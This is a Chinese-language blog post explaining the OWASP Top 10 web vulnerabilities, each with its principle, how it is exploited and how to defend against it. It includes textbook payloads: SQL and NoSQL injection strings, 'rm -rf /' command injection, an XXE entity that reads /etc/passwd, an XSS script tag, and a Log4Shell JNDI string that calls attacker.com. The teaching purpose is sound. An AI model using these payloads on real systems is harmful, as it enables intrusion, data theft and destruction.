

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="MaskObito">
  <meta name="keywords" content="">
  
    <meta name="description" content="owasp十大漏洞知识点 1. 注入（Injection） 原理：攻击者将恶意数据（如SQL、OS命令、NoQL）插入解释器中，欺骗解释器执行非预期命令。 利用方式： SQL注入：&#39; OR &#39;1&#39;&#x3D;&#39;1 绕过登录；UNION SELECT 窃取数据。 命令注入：; rm -rf &#x2F; 在参数中拼接系统命令。 NoSQL注入：&#123;&quot;$ne&quot;:">
<meta property="og:type" content="article">
<meta property="og:title" content="OWASP漏洞">
<meta property="og:url" content="http://maskobito.github.io/2025/03/23/OWASP%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="MaskObito">
<meta property="og:description" content="owasp十大漏洞知识点 1. 注入（Injection） 原理：攻击者将恶意数据（如SQL、OS命令、NoQL）插入解释器中，欺骗解释器执行非预期命令。 利用方式： SQL注入：&#39; OR &#39;1&#39;&#x3D;&#39;1 绕过登录；UNION SELECT 窃取数据。 命令注入：; rm -rf &#x2F; 在参数中拼接系统命令。 NoSQL注入：&#123;&quot;$ne&quot;:">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-03-23T12:44:00.000Z">
<meta property="article:modified_time" content="2025-09-24T06:09:14.081Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>OWASP漏洞 - MaskObito</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/neon.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"maskobito.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[],"type":"particle"},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"language":"zh-CN","enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null},"busuanzi":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong class="navbar-title">MaskObito</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>信息安全</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>CTF</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于本站</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/1.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="OWASP漏洞"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-03-23 20:44" pubdate>
          2025年3月23日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          976 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          9 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        

      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">OWASP漏洞</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="owasp十大漏洞知识点"><a href="#owasp十大漏洞知识点" class="headerlink" title="owasp十大漏洞知识点"></a>owasp十大漏洞知识点</h1><hr>
<h3 id="1-注入（Injection）"><a href="#1-注入（Injection）" class="headerlink" title="1. 注入（Injection）"></a>1. <strong>注入（Injection）</strong></h3><ul>
<li><strong>原理</strong>：攻击者将恶意数据（如SQL、OS命令、NoQL）插入解释器中，欺骗解释器执行非预期命令。</li>
<li><strong>利用方式</strong>：<ul>
<li><strong>SQL注入</strong>：<code>&#39; OR &#39;1&#39;=&#39;1</code> 绕过登录；<code>UNION SELECT</code> 窃取数据。</li>
<li><strong>命令注入</strong>：<code>; rm -rf /</code> 在参数中拼接系统命令。</li>
<li><strong>NoSQL注入</strong>：<code>&#123;&quot;$ne&quot;: &quot;1&quot;&#125;</code> 绕过MongoDB查询。</li>
</ul>
</li>
<li><strong>防御</strong>：参数化查询（Prepared Statements）、输入验证、ORM框架、最小权限原则。</li>
</ul>
<hr>
<h3 id="2-失效的身份认证（Broken-Authentication）"><a href="#2-失效的身份认证（Broken-Authentication）" class="headerlink" title="2. 失效的身份认证（Broken Authentication）"></a>2. <strong>失效的身份认证（Broken Authentication）</strong></h3><ul>
<li><strong>原理</strong>：身份验证或会话管理机制存在缺陷，导致账户被接管。</li>
<li><strong>利用方式</strong>：<ul>
<li>暴力破解弱密码（如<code>admin/password</code>）。</li>
<li>窃取Session ID（XSS、网络嗅探）。</li>
<li>滥用密码重置逻辑（如未验证邮箱所有权）。</li>
</ul>
</li>
<li><strong>防御</strong>：多因素认证（MFA）、强密码策略、安全存储Session、HTTPS加密。</li>
</ul>
<hr>
<h3 id="3-敏感数据泄露（Sensitive-Data-Exposure）"><a href="#3-敏感数据泄露（Sensitive-Data-Exposure）" class="headerlink" title="3. 敏感数据泄露（Sensitive Data Exposure）"></a>3. <strong>敏感数据泄露（Sensitive Data Exposure）</strong></h3><ul>
<li><strong>原理</strong>：未加密或弱加密保护敏感数据（密码、信用卡号）。</li>
<li><strong>利用方式</strong>：<ul>
<li>窃取未加密的传输数据（中间人攻击）。</li>
<li>获取备份数据库（如AWS S3公开访问）。</li>
</ul>
</li>
<li><strong>防御</strong>：TLS加密传输、静态数据加密（AES-256）、禁用缓存敏感数据、密钥管理。</li>
</ul>
<hr>
<h3 id="4-XML外部实体（XXE）"><a href="#4-XML外部实体（XXE）" class="headerlink" title="4. XML外部实体（XXE）"></a>4. <strong>XML外部实体（XXE）</strong></h3><ul>
<li><strong>原理</strong>：解析恶意XML时，引用外部实体导致文件读取&#x2F;SSRF。</li>
<li><strong>利用方式</strong>：<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">xxe</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;file:///etc/passwd&quot;</span>&gt;</span><br></code></pre></td></tr></table></figure>
读取服务器文件或发起内网请求。</li>
<li><strong>防御</strong>：禁用DTD&#x2F;外部实体（如<code>libxml_disable_entity_loader</code>）、使用JSON替代XML。</li>
</ul>
<hr>
<h3 id="5-失效的访问控制（Broken-Access-Control）"><a href="#5-失效的访问控制（Broken-Access-Control）" class="headerlink" title="5. 失效的访问控制（Broken Access Control）"></a>5. <strong>失效的访问控制（Broken Access Control）</strong></h3><ul>
<li><strong>原理</strong>：未对用户权限进行校验，允许越权操作。</li>
<li><strong>利用方式</strong>：<ul>
<li>修改URL参数（如<code>/user?id=123</code> → <code>id=124</code>）访问他人数据。</li>
<li>未授权访问管理接口（如<code>/admin</code> 无鉴权）。</li>
</ul>
</li>
<li><strong>防御</strong>：RBAC权限模型、服务端校验所有权、默认拒绝原则。</li>
</ul>
<hr>
<h3 id="6-安全配置错误（Security-Misconfiguration）"><a href="#6-安全配置错误（Security-Misconfiguration）" class="headerlink" title="6. 安全配置错误（Security Misconfiguration）"></a>6. <strong>安全配置错误（Security Misconfiguration）</strong></h3><ul>
<li><strong>原理</strong>：默认配置、冗余功能、错误HTTP头导致暴露漏洞。</li>
<li><strong>利用方式</strong>：<ul>
<li>访问未删除的调试页面（如<code>/phpinfo.php</code>）。</li>
<li>利用默认密码登录（Tomcat <code>admin:admin</code>）。</li>
</ul>
</li>
<li><strong>防御</strong>：最小化安装、定期扫描配置、自动化部署（如Ansible）、禁用目录列表。</li>
</ul>
<hr>
<h3 id="7-跨站脚本（XSS）"><a href="#7-跨站脚本（XSS）" class="headerlink" title="7. 跨站脚本（XSS）"></a>7. <strong>跨站脚本（XSS）</strong></h3><ul>
<li><strong>原理</strong>：恶意脚本注入到网页中，在用户浏览器执行。</li>
<li><strong>类型与利用</strong>：<ul>
<li><strong>反射型XSS</strong>：通过钓鱼链接传播（<code>http://site.com?search=&lt;script&gt;alert(1)&lt;/script&gt;</code>）。</li>
<li><strong>存储型XSS</strong>：恶意评论存入数据库，所有用户加载时触发。</li>
<li><strong>DOM型XSS</strong>：前端JS操作DOM时未转义（如<code>document.write(location.hash)</code>）。</li>
</ul>
</li>
<li><strong>防御</strong>：输出编码（HTML&#x2F;JS&#x2F;CSS）、CSP策略、输入验证、<code>HttpOnly</code> Cookie。</li>
</ul>
<hr>
<h3 id="8-不安全的反序列化（Insecure-Deserialization）"><a href="#8-不安全的反序列化（Insecure-Deserialization）" class="headerlink" title="8. 不安全的反序列化（Insecure Deserialization）"></a>8. <strong>不安全的反序列化（Insecure Deserialization）</strong></h3><ul>
<li><strong>原理</strong>：反序列化恶意数据导致远程代码执行（RCE）或权限提升。</li>
<li><strong>利用方式</strong>：<ul>
<li>Java反序列化漏洞（如Apache Commons Collections）。</li>
<li>篡改Cookie中的序列化对象提升权限。</li>
</ul>
</li>
<li><strong>防御</strong>：避免反序列化用户输入、使用JSON、签名验证数据完整性。</li>
</ul>
<hr>
<h3 id="9-使用含已知漏洞的组件（Vulnerable-Components）"><a href="#9-使用含已知漏洞的组件（Vulnerable-Components）" class="headerlink" title="9. 使用含已知漏洞的组件（Vulnerable Components）"></a>9. <strong>使用含已知漏洞的组件（Vulnerable Components）</strong></h3><ul>
<li><strong>原理</strong>：第三方库（如Log4j、Struts）存在公开漏洞。</li>
<li><strong>利用方式</strong>：<ul>
<li>CVE-2021-44228（Log4Shell）：<code>$&#123;jndi:ldap://attacker.com/exp&#125;</code> 触发RCE。</li>
</ul>
</li>
<li><strong>防御</strong>：依赖扫描工具（OWASP Dependency-Check）、定期更新、移除无用依赖。</li>
</ul>
<hr>
<h3 id="10-日志与监控不足（Insufficient-Logging-Monitoring）"><a href="#10-日志与监控不足（Insufficient-Logging-Monitoring）" class="headerlink" title="10. 日志与监控不足（Insufficient Logging &amp; Monitoring）"></a>10. <strong>日志与监控不足（Insufficient Logging &amp; Monitoring）</strong></h3><ul>
<li><strong>原理</strong>：未记录关键事件（登录失败、异常请求），导致攻击无法追溯。</li>
<li><strong>利用方式</strong>：攻击者横向移动而不触发告警（如数据窃取数月未被发现）。</li>
<li><strong>防御</strong>：集中化日志（ELK&#x2F;Splunk）、实时监控、设置告警阈值（如5分钟内20次登录失败）。</li>
</ul>
<hr>
<h3 id="关键防御策略"><a href="#关键防御策略" class="headerlink" title="关键防御策略"></a>关键防御策略</h3><ol>
<li><strong>纵深防御</strong>：多层安全措施（WAF+输入校验+编码+最小权限）。</li>
<li><strong>自动化工具</strong>：SAST&#x2F;DAST扫描（如ZAP、Burp Suite）、依赖检查。</li>
<li><strong>安全意识</strong>：开发人员安全培训（如安全编码规范）。</li>
<li><strong>威胁建模</strong>：设计阶段识别潜在风险（如STRIDE模型）。</li>
</ol>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/web%E6%BC%8F%E6%B4%9E/" class="category-chain-item">web漏洞</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>OWASP漏洞</div>
      <div>http://maskobito.github.io/2025/03/23/OWASP漏洞/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>MaskObito</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年3月23日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/04/17/POC/" title="POC">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">POC</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/03/21/ueditor/" title="ueditor">
                        <span class="hidden-mobile">ueditor</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    
      <script type="text/javascript">
        var disqus_config = function() {
          this.page.url = 'http://maskobito.github.io/2025/03/23/OWASP%E6%BC%8F%E6%B4%9E/';
          this.page.identifier = '/2025/03/23/OWASP%E6%BC%8F%E6%B4%9E/';
        };
        Fluid.utils.loadComments('#disqus_thread', function() {
          var d = document, s = d.createElement('script');
          s.src = '//' + 'fluid' + '.disqus.com/embed.js';
          s.setAttribute('data-timestamp', new Date());
          (d.head || d.body).appendChild(s);
        });
      </script>
    
    <noscript>Please enable JavaScript to view the comments</noscript>
  </div>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  
<script src="/js/typing-effect.js"></script>
<script src="/js/particle.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
